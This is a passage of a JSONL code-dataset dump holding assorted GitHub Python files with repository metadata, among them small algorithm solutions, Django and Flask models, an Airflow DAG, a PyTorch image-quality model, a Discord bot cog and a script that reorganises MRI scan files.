valor_final *= (1 + taxa_juros / 100)\n\nprint(f\"Valor final do investimento: R$ {valor_final:.2f}\")\n\n\"\"\" def calcular_juros_compostos(valor_inicial, taxa_juros, periodo):\n    valor_final = valor_inicial * (1 + taxa_juros / 100) ** periodo\n    return round(valor_final, 2)\n\n\nresultado = calcular_juros_compostos(valor_inicial, taxa_juros, periodo)\nprint(\"Valor Final:\", resultado) \"\"\"\n\n\n","repo_name":"michaelmdrs/dio","sub_path":"desafios/juros_compostos.py","file_name":"juros_compostos.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"17234397920","text":"#! /usr/bin/env python\nimport sys\nimport subprocess\nimport argparse\nimport os\nfrom fastq2matrix import vcf_class, nofile\n\n\ndef main(args):\n\tif nofile(args.vcf): quit(\"Can't find %s... Exiting!\" % args.vcf)\n\tvcf = vcf_class(args.vcf)\n\tvcf.vcf_to_matrix(args.no_iupacgt,na=args.na)\n\nparser = argparse.ArgumentParser(description='TBProfiler pipeline',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--vcf',help='VCF file',required=True)\nparser.add_argument('--no-iupacgt', dest='no_iupacgt', action='store_true')\nparser.add_argument('--na', default=\"N\",help = \"Character to use for missing data value\")\nparser.add_argument('--threads',default=4, type=int, help='Number of threads for parallel operations')\nparser.set_defaults(func=main)\n\nargs = parser.parse_args()\nargs.func(args)\n","repo_name":"pathogenseq/fastq2matrix","sub_path":"scripts/vcf2matrix.py","file_name":"vcf2matrix.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"5951055729","text":"from django.db import models\nfrom clients.models import ClientModel\n# Create your models here.\nclass ComunicationModel(models.Model):\n    client_question = models.ForeignKey(ClientModel, on_delete=models.DO_NOTHING, related_name=\"client_question\")\n    # a related_name is set because the reverse-accessor error would otherwise block a second relation to the same model\n    client_seller = models.ForeignKey(ClientModel, on_delete=models.CASCADE, related_name=\"client_seller\")\n    question = models.TextField()\n    answer = models.TextField(blank=True, default=\"\") \n    \n    @property\n    def is_answer(self):\n        return bool(self.answer)\n    # this property returns a boolean indicating whether the answer is empty or not","repo_name":"S4ntifdz/MercadoVilla","sub_path":"comunication/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"12275858900","text":"\"\"\"\n    By now, you are given a secret signature consisting of characters 'D' and 'I'.\n    'D' represents a decreasing relationship between two numbers, 'I' represents an increasing relationship between two numbers.\n    And our secret signature was constructed by a special integer array, which contains uniquely all the different numbers from 1 to n\n    (n is the length of the secret signature plus 1).\n    For example, the secret signature \"DI\" can be constructed by array [2,1,3] or [3,1,2], but won't be constructed by array [3,2,4] or [2,1,3,4],\n    which are both illegal constructions that can't represent the \"DI\" secret signature.\n\nOn the other hand, now your job is to find the lexicographically smallest permutation of [1, 2, ... 
n] could refer to the given secret signature in the input.\n\nExample 1:\n\nInput: \"I\"\nOutput: [1,2]\nExplanation: [1,2] is the only legal initial spectial string can construct secret signature \"I\",\nwhere the number 1 and 2 construct an increasing relationship.\n\nExample 2:\n\nInput: \"DI\"\nOutput: [2,1,3]\nExplanation: Both [2,1,3] and [3,1,2] can construct the secret signature \"DI\",\nbut since we want to find the one with the smallest lexicographical permutation, you need to output [2,1,3]\n\nNote:\nThe input string will only contain the character 'D' and 'I'.\nThe length of input string is a positive integer and will not exceed 10,000\n\"\"\"\nclass Solution:\n \"\"\"\n Thoughts:\n 1. DDIDID\n 1234567\n 3215476\n 2. reverse continous D part in the increasing sequence\n\n Time: O(n*log(n)) where n is length of s\n Space: O(n)\n \"\"\"\n def findPermutation(self, s):\n \"\"\"\n :type s: str\n :rtype: List[int]\n \"\"\"\n ret = [i for i in range(1,len(s)+2)]\n index = 0\n while index Path:\n # walk json files\n list_of_session_nums = []\n\n for root, dirs, files in os.walk(rawdata_dir):\n if Path(root).name == 'extra':\n continue\n for file in files:\n if file.endswith('.json'):\n session_num_found = get_series_number(Path(root) / file)\n list_of_session_nums.append(session_num_found)\n if int(session_num_found) == int(session_number):\n print()\n return Path(root) / file\n \n # print(list_of_session_nums, session_number)\n \n \ndef put_nifti_in_the_extra(rawdata_dir: Path) -> Path:\n extra_dir = rawdata_dir / 'extra'\n if not extra_dir.is_dir():\n return\n \n for json in extra_dir.glob('*json'):\n json_prefix = json.name.split('.json')[0]\n \n other_nifti_files = rawdata_dir.glob('*/*nii.gz')\n for other_nifti_file in other_nifti_files:\n if other_nifti_file.parent.name == 'extra':\n continue\n\n nifti_prefix = other_nifti_file.name.split('.nii.gz')[0]\n if json_prefix == nifti_prefix:\n print(f'Moving {other_nifti_file} to extra')\n shutil.move(other_nifti_file, extra_dir / other_nifti_file.name)\n \n # bval\n other_bval_files = rawdata_dir.glob('*/*bval')\n for other_bval_file in other_bval_files:\n if other_bval_file.parent.name == 'extra':\n continue\n\n bval_prefix = other_bval_file.name.split('.bval')[0]\n if json_prefix == bval_prefix:\n print(f'Moving {other_bval_file} to extra')\n shutil.move(other_bval_file, extra_dir / other_bval_file.name) \n \n # bvec\n other_bval_files = rawdata_dir.glob('*/*bvec')\n for other_bval_file in other_bval_files:\n if other_bval_file.parent.name == 'extra':\n continue\n\n bval_prefix = other_bval_file.name.split('.bvec')[0]\n if json_prefix == bval_prefix:\n print(f'Moving {other_bval_file} to extra')\n shutil.move(other_bval_file, extra_dir / other_bval_file.name) \n\n\ndef move_extra_scans():\n # Setup the Google Sheets API credentials\n scope = [\"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"]\n\n json_loc = \"/data/predict1/home/nick/json_keys/gspread_official_key.json\"\n creds = ServiceAccountCredentials.from_json_keyfile_name(json_loc, scope)\n client = gspread.authorize(creds)\n\n # Open the Google Spreadsheet using its name\n sheet = client.open(\"U24 MRI QC\").worksheet(\"Extra Series\")\n\n # Get the values from the spreadsheet\n data = sheet.get_all_values()\n\n # Convert to pandas DataFrame\n df = pd.DataFrame(data[1:], columns=data[0])\n\n # df = pd.read_csv('U24 MRI QC - Extra Series 
(3).csv')\n df = df[~df['Certain (1: certain, 2: assumed)'].isnull()]\n df['site'] = df['sub_id_gs'].str[:2]\n\n df['Series in issue'] = df['Series in issue'].str.replace('func', 'fmri')\n df['Series in issue'] = df['Series in issue'].str.replace('dmri', 'dwi')\n df['Series in issue'] = df['Series in issue'].str.replace('anat', 'T1w')\n df['issue_in_fmri'] = df['Series in issue'].str.contains(\n 'fMRI', flags=re.IGNORECASE)\n df['issue_in_dwi'] = df['Series in issue'].str.contains(\n 'dwi', flags=re.IGNORECASE)\n df['issue_in_t1w'] = df['Series in issue'].str.contains(\n 't1w', flags=re.IGNORECASE)\n df['issue_in_t2w'] = df['Series in issue'].str.contains(\n 't2w', flags=re.IGNORECASE)\n df['issue_in_fmap'] = df['Series in issue'].str.contains(\n 'fmap', flags=re.IGNORECASE)\n\n\n\n print(df.groupby('Certain (1: certain, 2: assumed)').count()[\n ['sub_id_gs']])\n\n\n print(df[df['Certain (1: certain, 2: assumed)']==2].groupby(\n 'site').count()[['sub_id_gs']].sort_values(\n 'sub_id_gs',\n ascending=False))\n\n\n print(df[~df['Confirmed from data'].isnull()][[\n 'sub_id_gs', 'ses_id_gs', 'Confirmed from data']])\n\n\n df['number_of_series_to_move'] = df['Series Number to remove'].apply(\n lambda x: len(str(x).split(',')))\n\n\n for index, row in df.iterrows():\n certain = row['Certain (1: certain, 2: assumed)']\n if pd.isna(row['Series Number to remove']):\n continue\n \n if row['Series Number to remove'] == '':\n continue\n \n if certain != '1':\n print(row, 'is not certain')\n print()\n continue\n\n print(f'{row[\"sub_id_gs\"]} {row[\"ses_id_gs\"]}')\n for series_to_remove in row['Series Number to remove'].split(','):\n full_path = get_BIDS_file_with_session_num(\n row['rawdata_location_gs'],\n series_to_remove)\n full_path\n\n if full_path is None:\n print(f'Already moved')\n continue\n\n command = f'\\tremoving Series {series_to_remove} ({full_path.name}) of {row[\"Series in issue\"]} to extra'\n print(command)\n\n new_loc = full_path.parent.parent / 'extra' / full_path.name\n new_loc.parent.mkdir(exist_ok=True)\n\n if full_path != new_loc:\n command = f'\\tmv {full_path} {new_loc}'\n print(command)\n shutil.move(full_path, new_loc)\n \n put_nifti_in_the_extra(Path(row['rawdata_location_gs']))\n \n\nif __name__ == '__main__':\n move_extra_scans()\n","repo_name":"AMP-SCZ/qqc","sub_path":"scripts/move_extra_scans.py","file_name":"move_extra_scans.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24707387391","text":"import random\n\n# Open the txt file\n# TODO REPLACE THIS WITH YOUR FILE PATH\nf = open('words.txt', 'r')\n\n# Set what length of word you want to work with\nword_len = 4\n\n# Set how many words an ending needs to have to be included\nnum_words = 30\n\n# Store each line to a list of words\nunprocessed_words = f.readlines()\n\n\n\n# Create a list for the useable words\nwords = []\n\nfor word in unprocessed_words:\n # Convert the word to lowercase and clean it\n word = word.lower().strip()\n\n # Ignore words containing an apostrophe\n if \"'\" in word:\n continue\n\n # If the word is 4 letters long, add it to our new list of words to use\n if len(word) == word_len:\n # Only add it if it's not already in the list, so we get each word once\n if word not in words:\n words.append(word)\n\n# Print the number of unique four letter words\nprint(f'There are {len(words)} unique, {word_len} letter words in the text file\\n')\n\n\n\n# Create a dictionary for the word 
endings\nword_endings = {}\n\n# Map each two-letter ending to the list of words that share it\nfor word in words:\n    # Extract the last two letters of the word\n    word_end = word[-2:]\n\n    # If the ending isn't in the dictionary, add it with this word as its first entry\n    if word_endings.get(word_end) is None:\n        word_endings[word_end] = [word]\n\n    # If it's already there, append this word to its list\n    else:\n        word_endings[word_end].append(word)\n\n\n# Create a dictionary with the ending and length of its list of words\n# This gives a dict with the frequency of each ending\nending_freq = {k:len(v) for (k,v) in word_endings.items()}\n\n# Sort that dictionary by the number of words\n# So the ending with the most words will be at the top\nending_freq = dict(sorted(ending_freq.items(), key=lambda item: item[1], reverse=True))\n\n\n# Create a list for the popular word endings\npopular_endings = []\n\n# Print a title for the ending frequencies\nprint('| Ending | Frequency |')\n\n# Run through the dictionary and extract the ending and its frequency\nfor end, freq in ending_freq.items():\n    # If that frequency is num_words or over\n    if freq >= num_words:\n        # Print the ending and the frequency for the user\n        print(f'|{end:^8}|{freq:^11}|')\n\n        # Add the ending to a list of only our popular endings\n        popular_endings.append(end)\n\n\n\n# Create a list for our final words\nfinal_words = []\n\n# We want to pick a word for each ending in our popular endings list\nfor ending in popular_endings:\n\n    # For each ending, take one of its words randomly from the endings dictionary\n    # and add it to a variable\n    chosen_word = random.choice(word_endings[ending])\n\n    # Add this word to our final list of words\n    final_words.append(chosen_word)\n\n\n# We print the length of the list\nprint(f'\\nThere are {len(final_words)} words in our stimuli list:', end=' ')\n# And its contents\nfor word in final_words:\n    print(f'{word},', end=' ')\n\n# Close the text file\nf.close()\n","repo_name":"gabmackie/Exp_prep_and_fMRI_analysis_pin1","sub_path":"section_1A_improved.py","file_name":"section_1A_improved.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"2470951536","text":"class Solution:\n    def climbStairs(self, n: int) -> int:\n        # base cases\n        if n == 0: return 0\n        if n == 1: return 1\n        if n == 2: return 2\n\n        # dynamic programming approach:\n        # keep rolling counts of the ways for the previous two stair counts\n        prev0 = 1\n        prev1 = 2\n        s = 2\n        for i in range(2, n):\n            s = prev0 + prev1\n            prev0 = prev1\n            prev1 = s\n        \n        return s\n","repo_name":"oliverschwartz/leet","sub_path":"climbing_stairs/climbing_stairs_better.py","file_name":"climbing_stairs_better.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"37707982450","text":"import airflow.utils.dates\nfrom airflow.models import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\n\ndag = DAG(\n    dag_id=\"example_trigger_target_dag\",\n    default_args={\"start_date\": airflow.utils.dates.days_ago(2), \"owner\": \"Airflow\"},\n    schedule_interval=None,\n)\n\n\ndef run_this_func(**context):\n    \"\"\"\n    Print the payload \"message\" passed to the DagRun conf attribute.\n    :param context: The execution context\n    :type context: dict\n    \"\"\"\n    print(\"Remotely received value of {} for key=message\".format(context[\"dag_run\"].conf[\"message\"]))\n\n\nrun_this 
= PythonOperator(task_id=\"run_this\", python_callable=run_this_func, dag=dag)\n\nbash_task = BashOperator(\n task_id=\"bash_task\",\n bash_command='echo \"Here is the message: \\'{{ dag_run.conf[\"message\"] if dag_run else \"\" }}\\'\"',\n dag=dag,\n)","repo_name":"runpil/airflow-examples","sub_path":"examples/core-operators/trigger_target_dag_example.py","file_name":"trigger_target_dag_example.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74454492280","text":"import torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nfrom pytorch_lightning import LightningModule\r\nfrom timm.loss import LabelSmoothingCrossEntropy\r\n\r\nfrom torchmetrics import Accuracy\r\n \r\n\r\nclass BasePIQModel(LightningModule):\r\n def __init__(self, backbone, freeze_backbone=True, lr=1e-4, label_smoothing=0.1, alpha=0.5):\r\n super().__init__()\r\n\r\n self.backbone = backbone\r\n if freeze_backbone:\r\n self.backbone.eval()\r\n for param in self.backbone.parameters():\r\n param.requires_grad = False\r\n \r\n self.quality_loss = nn.L1Loss()\r\n if label_smoothing > 0:\r\n self.scene_loss = LabelSmoothingCrossEntropy(smoothing=label_smoothing)\r\n else:\r\n self.scene_loss = nn.CrossEntropyLoss()\r\n self.train_acc = Accuracy(task='multiclass', num_classes=4)\r\n self.val_acc = Accuracy(task='multiclass', num_classes=4)\r\n\r\n self.lr = lr\r\n self.alpha = alpha\r\n\r\n def forward(self, batch):\r\n x, target_quality, target_scene = self.get_inputs(batch)\r\n out = self.foward_features(x)\r\n quality = out['quality']\r\n scene = out['scene']\r\n return self.get_loss(quality, target_quality, scene, target_scene)\r\n \r\n def get_inputs(self, batch):\r\n x = batch['image']\r\n target_quality = batch['quality_score'].unsqueeze(1)\r\n target_scene = batch['scene_label']\r\n return x, target_quality, target_scene\r\n\r\n def foward_features(self, x):\r\n out = self.backbone(x)\r\n quality = out['quality']\r\n scene = out['scene']\r\n return {\r\n 'quality': quality,\r\n 'scene': scene\r\n }\r\n \r\n def get_loss(self, quality, target_quality, scene, target_scene):\r\n quality_loss = self.quality_loss(quality, target_quality)\r\n scene_loss = self.scene_loss(scene, target_scene)\r\n total_loss = self.alpha * quality_loss + (1 - self.alpha) * scene_loss\r\n \r\n if self.training:\r\n self.train_acc(scene, target_scene)\r\n else:\r\n self.val_acc(scene, target_scene)\r\n \r\n return total_loss, quality_loss, scene_loss\r\n \r\n def training_step(self, batch, batch_idx):\r\n loss, quality_loss, scene_loss = self.forward(batch)\r\n self.log('train_loss', loss)\r\n self.log('train_quality_loss', quality_loss)\r\n self.log('train_scene_loss', scene_loss)\r\n return loss\r\n \r\n def on_train_epoch_end(self):\r\n self.log('train_acc', self.train_acc.compute())\r\n self.train_acc.reset()\r\n \r\n def validation_step(self, batch, batch_idx):\r\n loss, quality_loss, scene_loss = self.forward(batch)\r\n self.log('val_loss', loss)\r\n self.log('val_quality_loss', quality_loss)\r\n self.log('val_scene_loss', scene_loss)\r\n return loss\r\n \r\n def on_validation_epoch_end(self):\r\n self.log('val_acc', self.val_acc.compute())\r\n self.val_acc.reset()\r\n \r\n def configure_optimizers(self):\r\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=10)\r\n return [optimizer], [scheduler]\r\n \r\n \r\nclass 
TargetFC(nn.Module):\r\n    \"\"\"\r\n    Fully connected operations for the target net\r\n\r\n    Note:\r\n        Weights & biases are different for different images in a batch,\r\n        thus here we use group convolution for calculating images in a batch with individual weights & biases.\r\n    \"\"\"\r\n    def __init__(self, weight, bias):\r\n        super(TargetFC, self).__init__()\r\n        self.weight = weight\r\n        self.bias = bias\r\n\r\n    def forward(self, input_):\r\n        input_re = input_.view(-1, input_.shape[0] * input_.shape[1], input_.shape[2], input_.shape[3])\r\n        weight_re = self.weight.view(self.weight.shape[0] * self.weight.shape[1], self.weight.shape[2], self.weight.shape[3], self.weight.shape[4])\r\n        bias_re = self.bias.view(self.bias.shape[0] * self.bias.shape[1])\r\n        out = F.conv2d(input=input_re, weight=weight_re, bias=bias_re, groups=self.weight.shape[0])\r\n\r\n        return out.view(input_.shape[0], self.weight.shape[1], input_.shape[2], input_.shape[3])\r\n    \r\n    \r\nclass HyperPIQModel(BasePIQModel):\r\n    def __init__(self, backbone, freeze_backbone=True, lr=1e-4, label_smoothing=0.1, alpha=0.5):\r\n        super().__init__(backbone, freeze_backbone=freeze_backbone, lr=lr, label_smoothing=label_smoothing, alpha=alpha)\r\n        \r\n        self.n_features = self.backbone.n_features\r\n        \r\n        self.semantic_conv = nn.Sequential(\r\n            nn.Conv2d(self.backbone.semantic_dim, 1024, 1, padding=(0, 0)),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(1024, 512, 1, padding=(0, 0)),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(512, self.n_features, 1, padding=(0, 0)),\r\n            nn.AdaptiveAvgPool2d((1, 1)),\r\n        )\r\n        \r\n        self.scene_head = nn.Sequential(\r\n            nn.Linear(self.n_features, 4),\r\n            nn.Softmax(dim=1),\r\n        )\r\n        \r\n        n_features = self.n_features\r\n        self.fc1w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n        self.fc1b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n        n_features = n_features // 2\r\n        self.fc2w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n        self.fc2b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n        n_features = n_features // 2\r\n        self.fc3w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n        self.fc3b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n        n_features = n_features // 2\r\n        self.fc4w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n        self.fc4b = nn.Linear(self.n_features, n_features // 2)\r\n        \r\n        n_features = n_features // 2\r\n        self.fc5w = nn.Linear(self.n_features, n_features)\r\n        self.fc5b = nn.Linear(self.n_features, 1)\r\n        \r\n    def foward_features(self, x):\r\n        out = self.backbone(x)\r\n        multiscale_feat = out['multiscale_feat']\r\n        semantic_feat = out['semantic_feat']\r\n        # print(multiscale_feat.shape)\r\n        # print(semantic_feat.shape)\r\n        \r\n        out = self.semantic_conv(semantic_feat)\r\n        out_flat = out.view(out.shape[0], -1)\r\n        scene = self.scene_head(out_flat)\r\n        \r\n        n_features = self.n_features\r\n        w1 = self.fc1w(out_flat)\r\n        w1 = w1.view(-1, n_features // 2, n_features, 1, 1)\r\n        b1 = self.fc1b(out_flat)\r\n        target_net1 = TargetFC(w1, b1)\r\n        target_net1.requires_grad_(False)\r\n        \r\n        n_features = n_features // 2\r\n        w2 = self.fc2w(out_flat)\r\n        w2 = w2.view(-1, n_features // 2, n_features, 1, 1)\r\n        b2 = self.fc2b(out_flat)\r\n        target_net2 = TargetFC(w2, b2)\r\n        target_net2.requires_grad_(False)\r\n        \r\n        n_features = n_features // 2\r\n        w3 = self.fc3w(out_flat)\r\n        w3 = w3.view(-1, n_features // 2, n_features, 1, 1)\r\n        b3 = self.fc3b(out_flat)\r\n        target_net3 = TargetFC(w3, b3)\r\n        target_net3.requires_grad_(False)\r\n        \r\n        n_features = n_features // 2\r\n        w4 = self.fc4w(out_flat)\r\n        w4 = w4.view(-1, 
n_features // 2, n_features, 1, 1)\r\n b4 = self.fc4b(out_flat)\r\n target_net4 = TargetFC(w4, b4)\r\n target_net4.requires_grad_(False)\r\n \r\n n_features = n_features // 2\r\n w5 = self.fc5w(out_flat)\r\n w5 = w5.view(-1, 1, n_features, 1, 1)\r\n b5 = self.fc5b(out_flat)\r\n target_net5 = TargetFC(w5, b5)\r\n target_net5.requires_grad_(False)\r\n \r\n multiscale_feat = multiscale_feat.view(multiscale_feat.shape[0], multiscale_feat.shape[1], 1, 1)\r\n out = target_net1(multiscale_feat)\r\n out = F.relu(out)\r\n out = target_net2(out)\r\n out = F.relu(out)\r\n out = target_net3(out)\r\n out = F.relu(out)\r\n out = target_net4(out)\r\n out = F.relu(out)\r\n out = target_net5(out).squeeze()\r\n \r\n return {\r\n 'quality': out,\r\n 'scene': scene\r\n }\r\n\r\n ","repo_name":"tungdop2/Portrait-Quality-Assessment","sub_path":"model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28218571606","text":"from ml.utils import consts\n\n\nclass Node(object):\n def __init__(self, id:int=None, sitename=consts.GUEST, fid:int=None,\n bid:int=None, weight:float=0, is_leaf:bool=False, sum_grad:float=None,\n sum_hess:float=None, left_nodeid:int=-1, right_nodeid:int=-1):\n self.id = id\n self.sitename = sitename\n self.fid = fid\n self.bid = bid\n self.weight = weight\n self.is_leaf = is_leaf\n self.sum_grad = sum_grad\n self.sum_hess = sum_hess\n self.left_nodeid = left_nodeid\n self.right_nodeid = right_nodeid\n\n\nclass SplitInfo(object):\n def __init__(self, sitename=consts.GUEST, best_fid:int=None, best_bid:int=None,\n sum_grad:float=0, sum_hess:float=0, gain:float=None):\n self.sitename = sitename\n self.best_fid = best_fid\n self.best_bid = best_bid\n self.sum_grad = sum_grad\n self.sum_hess = sum_hess\n self.gain = gain\n","repo_name":"Murlocccc/hetero-secure-boost-origin","sub_path":"ml/tree/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"136120306","text":"# this is where all the database models (schema) will reside\n\nimport datetime\n\nfrom app import db # import db from our app.py file\n\n########################## our code starts here #######################################\n\n# this is done for ORM\n\ngroup_chat_table = db.Table('grp_chat',\n\tdb.Column('stu_id', db.Integer, db.ForeignKey('student.id'), primary_key=True),\n\tdb.Column('uni_id', db.Integer, db.ForeignKey('university.id'), primary_key=True),\n\tdb.Column('admin_username',db.String(80), unique=False, nullable=True)\n)\n\n\n\nclass Student(db.Model):\n\t__tablename__ = 'student' #__tablename__ is an in-built variable\n\t# if we do not explicitly control the naming of our table, the tablename will get the class name\n\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.String(80), unique=True, nullable=False)\n\ttele_username = db.Column(db.String(80), unique=True, nullable=False)\n\tchat_id=db.Column(db.Integer, unique=True, nullable=False)\n\ttimestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow,\n\t onupdate=datetime.datetime.utcnow)\n\tfaculty = db.Column(db.String(80),unique=False,nullable=False)\n\t# many-to-many model\n\ttouni = db.relationship('University', secondary=group_chat_table,\n\t back_populates='tostu', cascade='all', lazy=True)\n\n\t######## defining methods for the objects\n\tdef __init__(self, name, 
tele_username,chat_id,faculty): # this is initialization, self is referring to the current object\n\t\tself.name = name\n\t\tself.tele_username = tele_username\n\t\tself.chat_id=chat_id\n\t\tself.faculty=faculty\n\n\n\tdef __repr__(self): # representation, if I want to print object only, what do I print. Equivalent to print(object)\n\t\treturn '<Student {} with id {} is created>'.format(self.name,self.id) # this will eventually be returned to the user when they post, and this return statement is the result shown to them if the object is created successfully\n\t\t# return '[id {}, desc {}]'.format(self.id,self.desc)\n\n\tdef serialize(self): # this must be in JSON format, which in python terms list/dict. convert single row in DB to a json object to user\n\t\treturn{\n\t\t\t'id':self.id,\n\t\t\t'name':self.name,\n\t\t\t'tele_username':self.tele_username,\n\t\t\t#'chat_id':self.chat_id,\n\t\t\t'faculty':self.faculty,\n\t\t\t'confirmed_uni': [{\"uni_id\":log.id,\"country\":log.country ,\"university\":log.name,\"grp_url\":log.grp_url}for log in self.touni]\n\t\t}\n\t# dict in python is unordered, so the result may not follow id, desc, price sequence\n\n\n\nclass University(db.Model):\n\t__tablename__ = 'university' #__tablename__ is an in-built variable\n\t# if we do not explicitly control the naming of our table, the tablename will get the class name\n\n\tid = db.Column(db.Integer, primary_key=True, unique=True)\n\tname = db.Column(db.String(1000), unique=True, nullable=False)\n\tcountry=db.Column(db.String(80), unique=False, nullable=False)\n\tgrp_url=db.Column(db.String(80), unique=False, nullable=True)\n\ttimestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow,\n\t onupdate=datetime.datetime.utcnow)\n\t# many-to-many model\n\ttostu = db.relationship('Student', secondary=group_chat_table,\n\t back_populates='touni'\n\t #, cascade='all',lazy=True\n\t )\n######## defining methods for the objects\n\tdef __init__(self, name,country): # this is initialization, self is referring to the current object\n\t\tself.name = name\n\t\tself.country = country\n\t\n\n\n\tdef __repr__(self): # representation, if I want to print object only, what do I print. Equivalent to print(object)\n\t\treturn '< University {} with id {} in country {} is created >'.format(self.name,self.id,self.country) # this will eventually be returned to the user when they post, and this return statement is the result shown to them if the object is created successfully\n\n\tdef serialize(self): # this must be in JSON format, which in python terms list/dict. 
convert single row in DB to a json object to user\n\t\treturn{\n\t\t\t'id':self.id,\n\t\t\t'name':self.name,\n\t\t\t'country':self.country,\n\t\t\t'grp_url':[] if self.grp_url is None else self.grp_url\n\t\t}\n\t# dict in python is unordered, so the result may not follow this particular sequence\n\n\n\n","repo_name":"wanning-lee-2018/SMT203Proj-preliminary-version-","sub_path":"proj_flask/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74703986681","text":"from discord.ext import commands\nfrom botSettings import settings\nimport logging\n\nfrom handlers import db_handler as mongo\nfrom handlers import cache\nfrom handlers import jobsQueue as queue\nimport shortuuid\n\n\n\n\n# Discord Bot cog\n\nclass Dev(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.db = mongo.Dbhandler()\n self.logger = logging.getLogger(__name__)\n self.logger.info('Init cmdDevTest COG')\n self.cache = cache.MyCacheLayer(self.bot)\n self.queue = queue.jobsQueue()\n self.settings = settings\n \n\n @commands.command(aliases=['Development'],pass_context=True, name='dev')\n async def dev(self, ctx):\n await ctx.message.add_reaction(\"⏳\")\n self.uid = shortuuid.uuid()\n self.allycodes = [376764962, 146197219, 631896435]\n if self.settings.SHITTYBOT_REQUESTS < 3:\n self.queue.add_request(self.uid)\n self.pos = self.queue.get_qposition(self.uid)\n self.msg1 = await ctx.send(f'Várakozó kérések száma: {self.pos}')\n\n #self.player_data = self.cache.get_chached(self.allycode)\n #if self.player_data is None:\n self.player_data = await self.cache.get_allycode(self.allycodes)\n # else:\n # print('Player data was chached')\n\n await ctx.send('Played data ready')\n\n else:\n self.msg1 = await ctx.send(f'Várakozó kérések száma több mint 3: {self.pos}')\n \n\n\n \n\n\n\n @dev.error\n async def josoultsag_hiba(self, ctx, error):\n self.ctx = ctx\n if isinstance(error, commands.CheckFailure):\n print(\"Permission error!!!\")\n await self.ctx.send('⛔ - Nincsen hozzá jogosultságod!')\n else:\n await self.ctx.send('⛔ - Szar van a palacsintában, próbáld újra \\n')\n\n\n\n\n\n\n\n\n# ---------------------------------------------\ndef setup(bot):\n bot.add_cog(Dev(bot))","repo_name":"deesnow/SnakeBot","sub_path":"expansions/cmdDev.py","file_name":"cmdDev.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74623928120","text":"import sys\nimport torch\nimport datasets\nimport csv\nfrom utils import Cubert_Model, DEVICE, MAX_LEN\nfrom utils import get_dataloader_input, get_dataloader\nfrom utils import eval_fn, all_metrics_scores\n\n# evaluation\nspan_model = Cubert_Model()\nspan_model.to(DEVICE)\nspan_model.load_state_dict(torch.load(\"finetuned_ckpts/Cubert-1K\", map_location=DEVICE))\n\ndef get_EM(examples_data, model=span_model):\n assert len(examples_data) == 1\n (model_input_ids, model_segment_ids,\n model_input_mask, model_labels_ids) = get_dataloader_input(examples_data,\n example_types_to_evaluate=\"all\",\n setting='ideal',\n vocab_file=\"pretrained_model_configs/vocab.txt\")\n target_sequences = model_labels_ids\n eval_data_loader, eval_file_length = get_dataloader(\n model_input_ids,\n model_input_mask,\n model_segment_ids,\n model_labels_ids\n )\n\n\n pruned_target_sequences, output_sequences, _ = eval_fn(\n eval_data_loader, model, DEVICE)\n\n pruned_target_sequences = 
